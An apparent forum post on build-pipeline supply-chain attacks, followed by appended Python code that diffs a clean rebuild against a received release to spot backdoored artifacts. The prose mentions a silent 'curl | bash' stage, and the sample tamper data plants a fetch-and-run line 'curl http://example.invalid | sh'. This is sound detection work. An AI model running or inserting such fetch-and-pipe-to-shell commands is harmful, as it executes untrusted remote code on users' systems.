When people think about Supply Chain security, they generally think of SBOM and vulnerabilities in your direct and transitive dependencies.
But most people are completely blind to vulnerabilities in the Build Pipeline of those same dependencies. The SLSA framework considers those (https://slsa.dev/spec/v0.1/threats#build-integrity-threats) to some extent. And OpenSSF aficionados know, but it's still niche.
I like to think of those as a parallel universe! An orthogonal plane of vulnerabilities that are beneath the surface and completely independent of vulnerabilities in the source code of the project itself. Basically never tracked as CVEs... Those can be nested deep, deep, in a transitive build dependency 5 levels down.
In the audit log of the organization you can see an event, but by that time you have lost visibility into what the attacker really executed.
So a malicious tag payload (stage 1) will still remain in events, but Stage 2 will be lost completely (only the fact that the log was deleted), and that would not leak what really was executed; something like `curl | bash` could be silent.
Most likely the end goal is to backdoor the final artifacts, so one could diff, I guess.
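One concrete way to do that diff, as an added example that is not part of the thread above: rebuild the dependency from source in a clean environment, hash every file of the resulting artifact tree, and compare it against the tree you received. Anything modified, added or missing is a lead, because a build-pipeline compromise that backdoors the final artifacts has to change bytes somewhere. The directory names and file contents below are constructed sample data, not real project paths.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_builds(reference_dir, candidate_dir):
    """Compare a trusted rebuild against a received artifact tree.

    Returns sorted lists of files whose content differs, files present only
    in the candidate, and files missing from the candidate.
    """
    ref = hash_tree(reference_dir)
    cand = hash_tree(candidate_dir)
    return {
        "modified": sorted(k for k in ref if k in cand and ref[k] != cand[k]),
        "added": sorted(set(cand) - set(ref)),
        "missing": sorted(set(ref) - set(cand)),
    }


def _write(base, rel, data):
    target = Path(base) / rel
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)


def make_sample_builds(base):
    """Constructed sample: a clean rebuild and a tampered release of the same package."""
    ref = Path(base) / "clean-rebuild"
    cand = Path(base) / "received-release"
    for d in (ref, cand):
        _write(d, "README", b"example package\n")
        _write(d, "lib/core.so", b"\x7fELF-core-sample")
    _write(ref, "bin/tool", b"#!/bin/sh\necho ok\n")
    # The received release carries an extra payload in the main binary and a
    # shared object the clean rebuild never produced.
    _write(cand, "bin/tool", b"#!/bin/sh\necho ok\ncurl http://example.invalid | sh\n")
    _write(cand, "lib/helper.so", b"\x7fELF-helper-sample")
    return str(ref), str(cand)


def demo():
    """Build the sample trees in a temp dir and return the diff report."""
    with tempfile.TemporaryDirectory() as tmp:
        ref, cand = make_sample_builds(tmp)
        return diff_builds(ref, cand)


if __name__ == "__main__":
    report = demo()
    for kind, files in report.items():
        print(f"{kind}: {files}")
```

In practice the reference tree comes from your own reproducible rebuild (or a second independent builder), and a non-empty `modified` or `added` list is what you escalate on; an empty report is only as strong as the build's reproducibility, so normalise timestamps and other legitimate nondeterminism first.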